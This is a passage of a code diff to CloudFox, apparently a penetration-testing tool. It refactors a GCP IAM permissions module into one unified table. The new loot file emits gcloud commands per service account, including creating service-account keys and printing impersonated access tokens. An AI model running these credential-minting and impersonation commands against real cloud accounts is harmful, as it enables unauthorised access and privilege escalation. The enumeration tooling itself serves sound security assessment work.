if ep.IsCrossProject { crossProjectCount++ } - if getDangerousPermissionInfo(ep.Permission) != nil { - dangerousCount++ + if ep.IsHighPrivilege { + highPrivCount++ } } logger.SuccessM(fmt.Sprintf("Exploded %d total permission entries for %d entities", len(m.ExplodedPerms), len(uniqueEntities)), globals.GCP_PERMISSIONS_MODULE_NAME) - logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | Dangerous: %d", - len(uniquePerms), inheritedCount, crossProjectCount, dangerousCount), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | High-privilege: %d", + len(uniquePerms), inheritedCount, crossProjectCount, highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) if len(m.GroupInfos) > 0 { groupsEnumerated := 0 @@ -209,27 +196,22 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) } logger.InfoM(fmt.Sprintf("Found %d group(s), enumerated membership for %d", len(m.GroupInfos), groupsEnumerated), globals.GCP_PERMISSIONS_MODULE_NAME) - // Warn about blindspot if we couldn't enumerate some groups unenumeratedGroups := len(m.GroupInfos) - groupsEnumerated if unenumeratedGroups > 0 { logger.InfoM(fmt.Sprintf("[WARNING] Could not enumerate membership for %d group(s) - permissions inherited via these groups are NOT visible!", unenumeratedGroups), globals.GCP_PERMISSIONS_MODULE_NAME) } } - // Write output m.writeOutput(ctx, logger) } // enumerateOrganizationBindings tries to get organization-level IAM bindings func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, logger internal.Logger) { - // Try to discover the organization orgsSvc := orgsservice.New() - // Use SearchProjects to find organizations from project ancestry if len(m.ProjectIDs) > 0 { iamSvc := IAMService.New() - // Try to get org bindings via the first project's ancestry bindings, err := iamSvc.PoliciesWithInheritance(m.ProjectIDs[0]) if err != nil { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -238,11 +220,15 @@ func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, l return } - // Extract org and folder bindings for _, binding := range bindings { if binding.ResourceType == "organization" { m.mu.Lock() m.OrgBindings = append(m.OrgBindings, binding) + // Track org IDs + if !contains(m.OrgIDs, binding.ResourceID) { + m.OrgIDs = append(m.OrgIDs, binding.ResourceID) + m.OrgNames[binding.ResourceID] = binding.ResourceID // Use ID as name for now + } m.mu.Unlock() } else if binding.ResourceType == "folder" { m.mu.Lock() @@ -264,7 +250,16 @@ func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, l } } - _ = orgsSvc // silence unused warning if not used + _ = orgsSvc +} + +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false } // ------------------------------ @@ -275,7 +270,6 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string logger.InfoM(fmt.Sprintf("Enumerating permissions in project: %s", projectID), globals.GCP_PERMISSIONS_MODULE_NAME) } - // Create service and fetch permissions with group expansion iamService := IAMService.New() entityPerms, groupInfos, err := iamService.GetAllEntityPermissionsWithGroupExpansion(projectID) if err != nil { @@ -285,10 +279,11 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string return } - // Explode permissions - create one entry per permission var explodedPerms []ExplodedPermission for _, ep := range entityPerms { for _, perm := range ep.Permissions { + isHighPriv := isHighPrivilegePermission(perm.Permission) + exploded := ExplodedPermission{ Entity: ep.Entity, EntityType: ep.EntityType, @@ -299,17 +294,23 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string ResourceScope: fmt.Sprintf("%s/%s", perm.ResourceType, perm.ResourceID), ResourceScopeType: perm.ResourceType, ResourceScopeID: perm.ResourceID, + ResourceScopeName: m.getScopeName(perm.ResourceType, perm.ResourceID), IsInherited: perm.IsInherited, InheritedFrom: perm.InheritedFrom, HasCondition: perm.HasCondition, Condition: perm.Condition, EffectiveProject: projectID, ProjectName: m.GetProjectName(projectID), + IsHighPrivilege: isHighPriv, + } + + // Parse condition title if present + if perm.HasCondition && perm.Condition != "" { + exploded.ConditionTitle = parseConditionTitle(perm.Condition) } // Detect cross-project access if ep.EntityType == "ServiceAccount" { - // Extract project from SA email (format: sa-name@project-id.iam.gserviceaccount.com) parts := strings.Split(ep.Email, "@") if len(parts) == 2 { saParts := strings.Split(parts[1], ".") @@ -327,21 +328,15 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string } } - // Thread-safe append m.mu.Lock() m.ExplodedPerms = append(m.ExplodedPerms, explodedPerms...) m.EntityPermissions = append(m.EntityPermissions, entityPerms...) m.GroupInfos = append(m.GroupInfos, groupInfos...) - // Generate loot for each entity + // Generate loot for _, ep := range entityPerms { m.addEntityToLoot(ep) } - - // Generate loot for group memberships - for _, gi := range groupInfos { - m.addGroupToLoot(gi) - } m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -349,217 +344,89 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string } } +func (m *PermissionsModule) getScopeName(scopeType, scopeID string) string { + switch scopeType { + case "project": + return m.GetProjectName(scopeID) + case "organization": + if name, ok := m.OrgNames[scopeID]; ok { + return name + } + return scopeID + case "folder": + return scopeID // Could be enhanced to lookup folder names + default: + return scopeID + } +} + +func parseConditionTitle(condition string) string { + // Try to extract title from condition if it looks like a struct + if strings.Contains(condition, "title:") { + parts := strings.Split(condition, "title:") + if len(parts) > 1 { + titlePart := strings.TrimSpace(parts[1]) + if idx := strings.Index(titlePart, " "); idx > 0 { + return titlePart[:idx] + } + return titlePart + } + } + return "" +} + // ------------------------------ // Loot File Management // ------------------------------ func (m *PermissionsModule) initializeLootFiles() { - m.LootMap["permissions-all"] = &internal.LootFile{ - Name: "permissions-all", - Contents: "# GCP Entity Permissions (All)\n# Generated by CloudFox\n# Format: Entity | Permission | Role | Scope | Inherited | Condition\n\n", - } - m.LootMap["permissions-high-privilege"] = &internal.LootFile{ - Name: "permissions-high-privilege", - Contents: "# GCP High-Privilege Permissions\n# Generated by CloudFox\n# These permissions can lead to privilege escalation\n\n", - } - m.LootMap["permissions-by-entity"] = &internal.LootFile{ - Name: "permissions-by-entity", - Contents: "# GCP Permissions Grouped by Entity\n# Generated by CloudFox\n\n", - } - m.LootMap["permissions-inherited"] = &internal.LootFile{ - Name: "permissions-inherited", - Contents: "# GCP Inherited Permissions\n# Generated by CloudFox\n# These permissions are inherited from folders or organization\n\n", - } - m.LootMap["permissions-conditional"] = &internal.LootFile{ - Name: "permissions-conditional", - Contents: "# GCP Conditional Permissions\n# Generated by CloudFox\n# These permissions have IAM conditions (conditional access)\n\n", - } - m.LootMap["group-memberships"] = &internal.LootFile{ - Name: "group-memberships", - Contents: "# GCP Group Memberships\n# Generated by CloudFox\n# Shows group members including nested groups\n\n", - } - m.LootMap["groups-unenumerated"] = &internal.LootFile{ - Name: "groups-unenumerated", - Contents: "# GCP Groups - Membership NOT Enumerated (BLINDSPOT)\n# Generated by CloudFox\n# These groups have IAM permissions but membership could not be enumerated\n# Members of these groups inherit permissions that are NOT visible in other output\n# Requires Cloud Identity API access to enumerate\n\n", - } - // Pentest-focused loot files - m.LootMap["permissions-dangerous"] = &internal.LootFile{ - Name: "permissions-dangerous", - Contents: "# GCP Dangerous Permissions (Privesc Risk)\n# Generated by CloudFox\n# These permissions can lead to privilege escalation\n\n", - } - m.LootMap["permissions-dangerous-by-category"] = &internal.LootFile{ - Name: "permissions-dangerous-by-category", - Contents: "# GCP Dangerous Permissions by Category\n# Generated by CloudFox\n\n", - } - m.LootMap["permissions-cross-project"] = &internal.LootFile{ - Name: "permissions-cross-project", - Contents: "# GCP Cross-Project Permissions\n# Generated by CloudFox\n# Service accounts with access to projects outside their home project\n\n", - } - m.LootMap["permissions-org-level"] = &internal.LootFile{ - Name: "permissions-org-level", - Contents: "# GCP Organization-Level Permissions\n# Generated by CloudFox\n# These permissions are inherited by ALL projects in the organization\n\n", + m.LootMap["permissions-commands"] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", } } func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { - // Permissions by entity - m.LootMap["permissions-by-entity"].Contents += fmt.Sprintf( - "# Entity: %s (Type: %s)\n"+ - "# Project: %s\n"+ - "# Roles: %s\n"+ - "# Total Permissions: %d (Unique: %d)\n", - ep.Email, ep.EntityType, - ep.ProjectID, - strings.Join(ep.Roles, ", "), - ep.TotalPerms, ep.UniquePerms, - ) - - // Sort permissions for consistent output - sortedPerms := make([]IAMService.PermissionEntry, len(ep.Permissions)) - copy(sortedPerms, ep.Permissions) - sort.Slice(sortedPerms, func(i, j int) bool { - return sortedPerms[i].Permission < sortedPerms[j].Permission - }) + // Only add service accounts with high-privilege permissions + hasHighPriv := false + var highPrivPerms []string - for _, perm := range sortedPerms { - inherited := "" - if perm.IsInherited { - inherited = fmt.Sprintf(" [inherited from %s]", perm.InheritedFrom) - } - condition := "" - if perm.HasCondition { - condition = fmt.Sprintf(" [condition: %s]", perm.Condition) - } - - m.LootMap["permissions-by-entity"].Contents += fmt.Sprintf( - " %s (via %s)%s%s\n", - perm.Permission, perm.Role, inherited, condition, - ) - - // All permissions - m.LootMap["permissions-all"].Contents += fmt.Sprintf( - "%s | %s | %s | %s/%s | %v | %s\n", - ep.Email, perm.Permission, perm.Role, perm.ResourceType, perm.ResourceID, perm.IsInherited, perm.Condition, - ) - - // High privilege permissions + for _, perm := range ep.Permissions { if isHighPrivilegePermission(perm.Permission) { - m.LootMap["permissions-high-privilege"].Contents += fmt.Sprintf( - "# Entity: %s (Type: %s)\n"+ - "# Permission: %s\n"+ - "# Role: %s (%s)\n"+ - "# Resource: %s/%s%s%s\n\n", - ep.Email, ep.EntityType, - perm.Permission, - perm.Role, perm.RoleType, - perm.ResourceType, perm.ResourceID, inherited, condition, - ) - } - - // Dangerous permissions with detailed categorization - if dpInfo := getDangerousPermissionInfo(perm.Permission); dpInfo != nil { - m.LootMap["permissions-dangerous"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Entity: %s (%s)\n"+ - "## Permission: %s\n"+ - "## Category: %s\n"+ - "## Description: %s\n"+ - "## Role: %s\n"+ - "## Project: %s%s%s\n\n", - dpInfo.RiskLevel, dpInfo.Category, - ep.Email, ep.EntityType, - dpInfo.Permission, - dpInfo.Category, - dpInfo.Description, - perm.Role, - perm.ResourceID, inherited, condition, - ) - - m.LootMap["permissions-dangerous-by-category"].Contents += fmt.Sprintf( - "[%s] %s | %s | %s | %s | %s\n", - dpInfo.RiskLevel, dpInfo.Category, ep.Email, dpInfo.Permission, dpInfo.Description, perm.ResourceID, - ) - } - - // Inherited permissions - if perm.IsInherited { - m.LootMap["permissions-inherited"].Contents += fmt.Sprintf( - "%s | %s | %s | %s\n", - ep.Email, perm.Permission, perm.Role, perm.InheritedFrom, - ) - } - - // Conditional permissions - if perm.HasCondition { - m.LootMap["permissions-conditional"].Contents += fmt.Sprintf( - "%s | %s | %s | %s\n", - ep.Email, perm.Permission, perm.Role, perm.Condition, - ) - } - - // Organization-level permissions - if perm.ResourceType == "organization" { - m.LootMap["permissions-org-level"].Contents += fmt.Sprintf( - "%s | %s | %s | %s\n", - ep.Email, perm.Permission, perm.Role, perm.ResourceID, - ) + hasHighPriv = true + highPrivPerms = append(highPrivPerms, perm.Permission) } } - m.LootMap["permissions-by-entity"].Contents += "\n" -} -// addGroupToLoot adds group membership information to loot files -func (m *PermissionsModule) addGroupToLoot(gi IAMService.GroupInfo) { - enumStatus := "not enumerated" - if gi.MembershipEnumerated { - enumStatus = "enumerated" - } - - m.LootMap["group-memberships"].Contents += fmt.Sprintf( - "# Group: %s\n"+ - "# Display Name: %s\n"+ - "# Project: %s\n"+ - "# Member Count: %d\n"+ - "# Has Nested Groups: %v\n"+ - "# Membership Status: %s\n"+ - "# Roles: %s\n", - gi.Email, - gi.DisplayName, - gi.ProjectID, - gi.MemberCount, - gi.HasNestedGroups, - enumStatus, - strings.Join(gi.Roles, ", "), - ) - - if gi.MembershipEnumerated && len(gi.Members) > 0 { - m.LootMap["group-memberships"].Contents += "# Members:\n" - for _, member := range gi.Members { - m.LootMap["group-memberships"].Contents += fmt.Sprintf( - " - %s (Type: %s, Role: %s)\n", - member.Email, member.Type, member.Role, + if ep.EntityType == "ServiceAccount" { + if hasHighPriv { + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "# Service Account: %s [HIGH PRIVILEGE]\n"+ + "# High-privilege permissions: %s\n"+ + "# Roles: %s\n", + ep.Email, + strings.Join(highPrivPerms, ", "), + strings.Join(ep.Roles, ", "), + ) + } else { + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Roles: %s\n", + ep.Email, + strings.Join(ep.Roles, ", "), ) } - } - if gi.HasNestedGroups && len(gi.NestedGroups) > 0 { - m.LootMap["group-memberships"].Contents += "# Nested Groups:\n" - for _, nested := range gi.NestedGroups { - m.LootMap["group-memberships"].Contents += fmt.Sprintf(" - %s\n", nested) - } - } - - m.LootMap["group-memberships"].Contents += "\n" - - // Track unenumerated groups as a blindspot - if !gi.MembershipEnumerated { - m.LootMap["groups-unenumerated"].Contents += fmt.Sprintf( - "# BLINDSPOT: Group %s\n"+ - "# Project: %s\n"+ - "# Roles assigned to this group: %s\n"+ - "# Members of this group inherit these roles but are NOT visible!\n\n", - gi.Email, - gi.ProjectID, - strings.Join(gi.Roles, ", "), + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, ) } } @@ -574,454 +441,222 @@ func isHighPrivilegePermission(permission string) bool { return false } -// DangerousPermissionInfo contains detailed info about a dangerous permission -type DangerousPermissionInfo struct { - Permission string - Category string - RiskLevel string - Description string +// PermFederatedIdentityInfo contains parsed information about a federated identity +type PermFederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. + PoolName string + Subject string + Attribute string } -// getDangerousPermissionInfo returns detailed info if permission is dangerous, nil otherwise -func getDangerousPermissionInfo(permission string) *DangerousPermissionInfo { - dangerousPerms := privescservice.GetDangerousPermissions() - for _, dp := range dangerousPerms { - if permission == dp.Permission { - return &DangerousPermissionInfo{ - Permission: dp.Permission, - Category: dp.Category, - RiskLevel: dp.RiskLevel, - Description: dp.Description, - } - } - } - return nil -} +// parsePermFederatedIdentity detects and parses federated identity principals +func parsePermFederatedIdentity(identity string) PermFederatedIdentityInfo { + info := PermFederatedIdentityInfo{} -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // ======================================== - // TABLE 1: EXPLODED PERMISSIONS (Main table - one row per permission) - // ======================================== - explodedHeader := []string{ - "Entity", - "Type", - "Permission", - "Role", - "Role Type", - "Resource Scope", - "Scope Type", - "Scope ID", - "Inherited", - "Inherited From", - "Condition", - "Effective Project", - "Project Name", - "Cross-Project", + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info } - var explodedBody [][]string - for _, ep := range m.ExplodedPerms { - inherited := "" - if ep.IsInherited { - inherited = "✓" - } - crossProject := "" - if ep.IsCrossProject { - crossProject = fmt.Sprintf("✓ (from %s)", ep.SourceProject) - } - condition := "" - if ep.HasCondition { - condition = ep.Condition - } + info.IsFederated = true - explodedBody = append(explodedBody, []string{ - ep.EntityEmail, - ep.EntityType, - ep.Permission, - ep.Role, - ep.RoleType, - ep.ResourceScope, - ep.ResourceScopeType, - ep.ResourceScopeID, - inherited, - ep.InheritedFrom, - condition, - ep.EffectiveProject, - ep.ProjectName, - crossProject, - }) - } - - // Sort by entity, then by permission for consistent output - sort.Slice(explodedBody, func(i, j int) bool { - if explodedBody[i][0] != explodedBody[j][0] { - return explodedBody[i][0] < explodedBody[j][0] + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } } - return explodedBody[i][2] < explodedBody[j][2] - }) - - // ======================================== - // TABLE 2: Entity summary table - // ======================================== - summaryHeader := []string{ - "Entity", - "Type", - "Total Perms", - "Unique Perms", - "Roles", - "High Priv", - "Dangerous", - "Inherited", - "Conditional", - "Projects", - "Cross-Project", } - // Aggregate by entity - entityStats := make(map[string]*struct { - entityType string - totalPerms int - uniquePerms map[string]bool - roles map[string]bool - highPriv int - dangerous int - inherited int - conditional int - projects map[string]bool - crossProject int - }) - - for _, ep := range m.ExplodedPerms { - if entityStats[ep.Entity] == nil { - entityStats[ep.Entity] = &struct { - entityType string - totalPerms int - uniquePerms map[string]bool - roles map[string]bool - highPriv int - dangerous int - inherited int - conditional int - projects map[string]bool - crossProject int - }{ - entityType: ep.EntityType, - uniquePerms: make(map[string]bool), - roles: make(map[string]bool), - projects: make(map[string]bool), + // Detect provider type based on common patterns + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + info.ProviderType = "OIDC" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + // Format: .../subject/{subject} + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] } - } - stats := entityStats[ep.Entity] - stats.totalPerms++ - stats.uniquePerms[ep.Permission] = true - stats.roles[ep.Role] = true - stats.projects[ep.EffectiveProject] = true - if isHighPrivilegePermission(ep.Permission) { - stats.highPriv++ - } - if getDangerousPermissionInfo(ep.Permission) != nil { - stats.dangerous++ - } - if ep.IsInherited { - stats.inherited++ - } - if ep.HasCondition { - stats.conditional++ - } - if ep.IsCrossProject { - stats.crossProject++ } } - var summaryBody [][]string - for entity, stats := range entityStats { - crossProjectStr := "" - if stats.crossProject > 0 { - crossProjectStr = fmt.Sprintf("✓ (%d)", stats.crossProject) - } - summaryBody = append(summaryBody, []string{ - extractEmailFromEntity(entity), - stats.entityType, - fmt.Sprintf("%d", stats.totalPerms), - fmt.Sprintf("%d", len(stats.uniquePerms)), - fmt.Sprintf("%d", len(stats.roles)), - fmt.Sprintf("%d", stats.highPriv), - fmt.Sprintf("%d", stats.dangerous), - fmt.Sprintf("%d", stats.inherited), - fmt.Sprintf("%d", stats.conditional), - fmt.Sprintf("%d", len(stats.projects)), - crossProjectStr, - }) + return info +} + +// formatPermFederatedInfo formats federated identity info for display +func formatPermFederatedInfo(info PermFederatedIdentityInfo) string { + if !info.IsFederated { + return "-" } - // Sort by dangerous count descending - sort.Slice(summaryBody, func(i, j int) bool { - di := 0 - dj := 0 - fmt.Sscanf(summaryBody[i][6], "%d", &di) - fmt.Sscanf(summaryBody[j][6], "%d", &dj) - return di > dj - }) + result := info.ProviderType - // ======================================== - // TABLE 3: Permissions by Scope (org/folder/project) - // ======================================== - scopeHeader := []string{ - "Scope Type", - "Scope ID", - "Entity", - "Type", - "Permission", - "Role", - "Inherited From", - "Condition", + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" } - var scopeBody [][]string - for _, ep := range m.ExplodedPerms { - scopeBody = append(scopeBody, []string{ - ep.ResourceScopeType, - ep.ResourceScopeID, - ep.EntityEmail, - ep.EntityType, - ep.Permission, - ep.Role, - ep.InheritedFrom, - ep.Condition, - }) + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" } - // Sort by scope type (org first, then folder, then project), then scope ID - scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} - sort.Slice(scopeBody, func(i, j int) bool { - if scopeBody[i][0] != scopeBody[j][0] { - return scopeOrder[scopeBody[i][0]] < scopeOrder[scopeBody[j][0]] - } - return scopeBody[i][1] < scopeBody[j][1] - }) + return result +} - // ======================================== - // TABLE 4: Dangerous permissions table - // ======================================== - dangerousHeader := []string{ - "Risk", - "Category", - "Entity", - "Type", - "Permission", - "Description", - "Role", - "Scope", - "Inherited", - "Effective Project", - "Project Name", +// formatCondition formats a condition for display +func formatPermissionCondition(hasCondition bool, condition, conditionTitle string) string { + if !hasCondition { + return "No" } - var dangerousBody [][]string - criticalCount := 0 - for _, ep := range m.ExplodedPerms { - if dpInfo := getDangerousPermissionInfo(ep.Permission); dpInfo != nil { - inherited := "" - if ep.IsInherited { - inherited = ep.InheritedFrom - } - dangerousBody = append(dangerousBody, []string{ - dpInfo.RiskLevel, - dpInfo.Category, - ep.EntityEmail, - ep.EntityType, - dpInfo.Permission, - dpInfo.Description, - ep.Role, - ep.ResourceScope, - inherited, - ep.EffectiveProject, - ep.ProjectName, - }) - if dpInfo.RiskLevel == "CRITICAL" { - criticalCount++ - } - } + if conditionTitle != "" { + return conditionTitle } - // Sort by risk level - riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4} - sort.Slice(dangerousBody, func(i, j int) bool { - return riskOrder[dangerousBody[i][0]] < riskOrder[dangerousBody[j][0]] - }) - - // ======================================== - // TABLE 5: Cross-project permissions - // ======================================== - crossProjectHeader := []string{ - "Entity", - "Type", - "Source Project", - "Target Project", - "Target Project Name", - "Permission", - "Role", - "Inherited", + // Parse common patterns + if strings.Contains(condition, "request.time") { + return "[time-limited]" } - - var crossProjectBody [][]string - for _, ep := range m.ExplodedPerms { - if ep.IsCrossProject { - inherited := "" - if ep.IsInherited { - inherited = ep.InheritedFrom - } - crossProjectBody = append(crossProjectBody, []string{ - ep.EntityEmail, - ep.EntityType, - ep.SourceProject, - ep.EffectiveProject, - ep.ProjectName, - ep.Permission, - ep.Role, - inherited, - }) - } + if strings.Contains(condition, "resource.name") { + return "[resource-scoped]" + } + if strings.Contains(condition, "origin.ip") || strings.Contains(condition, "request.origin") { + return "[IP-restricted]" + } + if strings.Contains(condition, "device") { + return "[device-policy]" } - // ======================================== - // TABLE 6: High privilege permissions table - // ======================================== - highPrivHeader := []string{ - "Entity", - "Type", + return "Yes" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single unified table with all permissions + header := []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Entity Type", + "Identity", "Permission", "Role", - "Scope", + "Custom Role", "Inherited", + "Inherited From", "Condition", - "Effective Project", - "Project Name", + "Cross-Project", + "High Privilege", + "Federated", } - var highPrivBody [][]string + var body [][]string for _, ep := range m.ExplodedPerms { - if isHighPrivilegePermission(ep.Permission) { - inherited := "" - if ep.IsInherited { - inherited = ep.InheritedFrom - } - condition := "" - if ep.HasCondition { - condition = ep.Condition - } - - highPrivBody = append(highPrivBody, []string{ - ep.EntityEmail, - ep.EntityType, - ep.Permission, - ep.Role, - ep.ResourceScope, - inherited, - condition, - ep.EffectiveProject, - ep.ProjectName, - }) + isCustom := "No" + if ep.RoleType == "custom" || strings.HasPrefix(ep.Role, "projects/") || strings.HasPrefix(ep.Role, "organizations/") { + isCustom = "Yes" } - } - // ======================================== - // TABLE 7: Group membership table - // ======================================== - groupHeader := []string{ - "Group Email", - "Display Name", - "Member Count", - "Nested Groups", - "Enumerated", - "Roles", - "Project Name", - "Project ID", - } - - var groupBody [][]string - for _, gi := range m.GroupInfos { - enumStatus := "No" - if gi.MembershipEnumerated { - enumStatus = "Yes" + inherited := "No" + if ep.IsInherited { + inherited = "Yes" } - nestedGroups := "" - if gi.HasNestedGroups { - nestedGroups = fmt.Sprintf("%d", len(gi.NestedGroups)) + + inheritedFrom := "-" + if ep.IsInherited && ep.InheritedFrom != "" { + inheritedFrom = ep.InheritedFrom } - groupBody = append(groupBody, []string{ - gi.Email, - gi.DisplayName, - fmt.Sprintf("%d", gi.MemberCount), - nestedGroups, - enumStatus, - fmt.Sprintf("%d", len(gi.Roles)), - m.GetProjectName(gi.ProjectID), - gi.ProjectID, - }) - } + condition := formatPermissionCondition(ep.HasCondition, ep.Condition, ep.ConditionTitle) - // ======================================== - // TABLE 8: Group members detail table - // ======================================== - groupMembersHeader := []string{ - "Group Email", - "Member Email", - "Member Type", - "Role in Group", - "Project Name", - "Project ID", - } + crossProject := "No" + if ep.IsCrossProject { + crossProject = fmt.Sprintf("Yes (from %s)", ep.SourceProject) + } - var groupMembersBody [][]string - for _, gi := range m.GroupInfos { - if gi.MembershipEnumerated { - for _, member := range gi.Members { - groupMembersBody = append(groupMembersBody, []string{ - gi.Email, - member.Email, - member.Type, - member.Role, - m.GetProjectName(gi.ProjectID), - gi.ProjectID, - }) - } + highPriv := "No" + if ep.IsHighPrivilege { + highPriv = "Yes" } - } - // ======================================== - // TABLE 9: Inherited permissions table - // ======================================== - inheritedHeader := []string{ - "Entity", - "Type", - "Permission", - "Role", - "Inherited From", - "Scope Type", - "Effective Project", - "Project Name", + // Check for federated identity + federated := formatPermFederatedInfo(parsePermFederatedIdentity(ep.EntityEmail)) + + body = append(body, []string{ + ep.ResourceScopeType, + ep.ResourceScopeID, + ep.ResourceScopeName, + ep.EntityType, + ep.EntityEmail, + ep.Permission, + ep.Role, + isCustom, + inherited, + inheritedFrom, + condition, + crossProject, + highPriv, + federated, + }) } - var inheritedBody [][]string - for _, ep := range m.ExplodedPerms { - if ep.IsInherited { - inheritedBody = append(inheritedBody, []string{ - ep.EntityEmail, - ep.EntityType, - ep.Permission, - ep.Role, - ep.InheritedFrom, - ep.ResourceScopeType, - ep.EffectiveProject, - ep.ProjectName, - }) + // Sort by scope type (org first, then folder, then project), then entity, then permission + scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} + sort.Slice(body, func(i, j int) bool { + if body[i][0] != body[j][0] { + return scopeOrder[body[i][0]] < scopeOrder[body[j][0]] } - } + if body[i][4] != body[j][4] { + return body[i][4] < body[j][4] + } + return body[i][5] < body[j][5] + }) // Collect loot files var lootFiles []internal.LootFile @@ -1031,83 +666,31 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log } } - // Build tables tables := []internal.TableFile{ { - Name: "permissions-exploded", - Header: explodedHeader, - Body: explodedBody, - }, - { - Name: "permissions-summary", - Header: summaryHeader, - Body: summaryBody, + Name: "permissions", + Header: header, + Body: body, }, } - // Add scope table - if len(scopeBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "permissions-by-scope", - Header: scopeHeader, - Body: scopeBody, - }) - } - - // Add dangerous permissions table (pentest-focused) - if len(dangerousBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "permissions-dangerous", - Header: dangerousHeader, - Body: dangerousBody, - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d dangerous permission entries (%d CRITICAL) - privesc risk!", len(dangerousBody), criticalCount), globals.GCP_PERMISSIONS_MODULE_NAME) - } - - // Add cross-project table - if len(crossProjectBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "permissions-cross-project", - Header: crossProjectHeader, - Body: crossProjectBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", len(crossProjectBody)), globals.GCP_PERMISSIONS_MODULE_NAME) - } - - // Add high privilege table if there are any - if len(highPrivBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "permissions-high-privilege", - Header: highPrivHeader, - Body: highPrivBody, - }) - } - - // Add inherited permissions table - if len(inheritedBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "permissions-inherited", - Header: inheritedHeader, - Body: inheritedBody, - }) + // Log findings + highPrivCount := 0 + crossProjectCount := 0 + for _, ep := range m.ExplodedPerms { + if ep.IsHighPrivilege { + highPrivCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } } - // Add group summary table if there are any groups - if len(groupBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "permissions-groups", - Header: groupHeader, - Body: groupBody, - }) + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege permission entries!", highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) } - - // Add group members detail table if there are enumerated members - if len(groupMembersBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "permissions-group-members", - Header: groupMembersHeader, - Body: groupMembersBody, - }) + if crossProjectCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", crossProjectCount), 